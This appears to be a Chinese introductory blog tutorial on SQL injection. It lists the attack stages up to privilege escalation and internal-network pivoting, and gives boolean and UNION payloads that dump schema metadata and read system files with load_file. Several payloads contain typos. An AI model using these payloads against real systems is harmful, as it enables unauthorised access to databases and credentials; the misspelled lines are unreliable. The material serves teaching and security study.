网络安全最新【网络安全】浅识 SQL 注入_sq注入asclii

本文详细介绍了SQL注入的基本概念、注入流程、各种注入技巧(如手动注入、布尔注入和使用SQLMap工具),以及在实际场景中的应用,包括GET和POST方法注入、绕过安全机制的方法,以及如何通过SQLMap进行数据获取。最后以一个实战例子演示了SQL注入的整个过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

image.png

image.png


数据操作

插入: image.png

查询: image.png

删除: image.png

注入流程

  1. 判断是否有 SQL 注入漏洞;
  2. 判断操作系统和数据库类型;
  3. 获取数据库信息;
  4. 加密信息破解;
  5. 提升权限;
  6. 内网渗透;

image.png

手动注入

布尔注入

闭合 SQL 语句,构造 orand 逻辑语句、注释多余的代码;

  • or 1=1 -- 注释后有空格;
  • admin' and 1=1 -- ' 查询指定账号的密码;
  • admin' or 1=1 -- ' 查询所有账号密码;

union

  • 前后查询的项数和顺序要一样;
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
复制代码

  • 'union select 1,2 -- ' | 'union select 1,2,3 -- ' 先测试查询有几项;

查询数据库

  • 'union select 1,table_name from INFORMATION_SCHEMA.tables -- '
  • 'union select version(),database() from INFORMATION_SCHEMA.tables -- '
  • 'union selcect user(),databases() form INFORMATION_SCHEMA.tables -- '
  • 'union select load_file('/etc/password'),database() from INFORMATION_SCHEMA.tables -- '
  • 'union select load_file('2f6...264'),database() from INFORMATION_SCHEMA.tables -- ' 16进制;
  • information_schema 数据库是 MYSQL 自带的,提供了访问数据库元数据的方式。元数据包括数据库名、表名、列数据类型、访问权限、字符集等基础信息。

查询数据表

'union select 1,column_name from INFORMATION_SCHEMA.columns where table_name = 'USER_PRIVILEGES' -- '
'union select 1,column_name from INFORMATION_SCHEMA.columns where table_name = 'users' 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值